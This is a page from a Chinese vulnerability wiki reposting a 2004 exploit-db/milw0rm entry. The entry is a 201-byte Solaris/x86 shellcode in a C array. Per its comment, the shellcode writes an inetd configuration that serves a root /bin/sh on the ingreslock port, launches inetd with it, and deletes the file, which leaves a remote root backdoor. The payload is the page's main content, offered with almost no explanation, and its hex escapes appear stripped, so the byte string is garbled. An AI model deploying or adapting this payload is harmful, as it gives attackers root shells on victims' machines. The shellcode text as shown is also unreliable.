Solaris/x86 – inetd Add Service + execve() Shellcode (201 bytes)

Solaris/x86 – inetd Add Service + execve() Shellcode (201 bytes)

漏洞ID 1054635 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-Solaris/x86 – inetd Add Service + execve() Shellcode (201 bytes)-安全小百科CVE编号 N/A
图片[2]-Solaris/x86 – inetd Add Service + execve() Shellcode (201 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Solaris_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13502
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 *  Solaris/x86
 *
 *  Just execve()'s the following:
 *   "echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;"
 *   "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x";
 *
 *  for a trivial remote bd. Used in a few old Solaris/x86 remote exploits. 
 */
 
char c0de[] =
"xebx3dx9ax24x24x24x24x07x24xc3x5ex29xc0x89x46xbfx88x46xc4"
"x89x46x0cx88x46x17x88x46x1ax88x46x78x29xc0x50x56x8dx5ex10"
"x89x1ex53x8dx5ex18x89x5ex04x8dx5ex1bx89x5ex08xb0x3bxe8xc6"
"xffxffxffxffxffxffxe8xc6xffxffxffx01x01x01x01x02x02x02x02"
"x03x03x03x03x04x04x04x04"
"x2fx62x69x6ex2fx73x68x20x2dx63x20"
"echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;"
"/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x";

/* EOF */

# milw0rm.com [2004-09-26]

相关推荐: Glftpd Remote Vulnerabilities

Glftpd Remote Vulnerabilities 漏洞ID 1104408 漏洞类型 Input Validation Error 发布时间 1999-12-23 更新时间 1999-12-23 CVE编号 N/A CNNVD-ID N/A 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享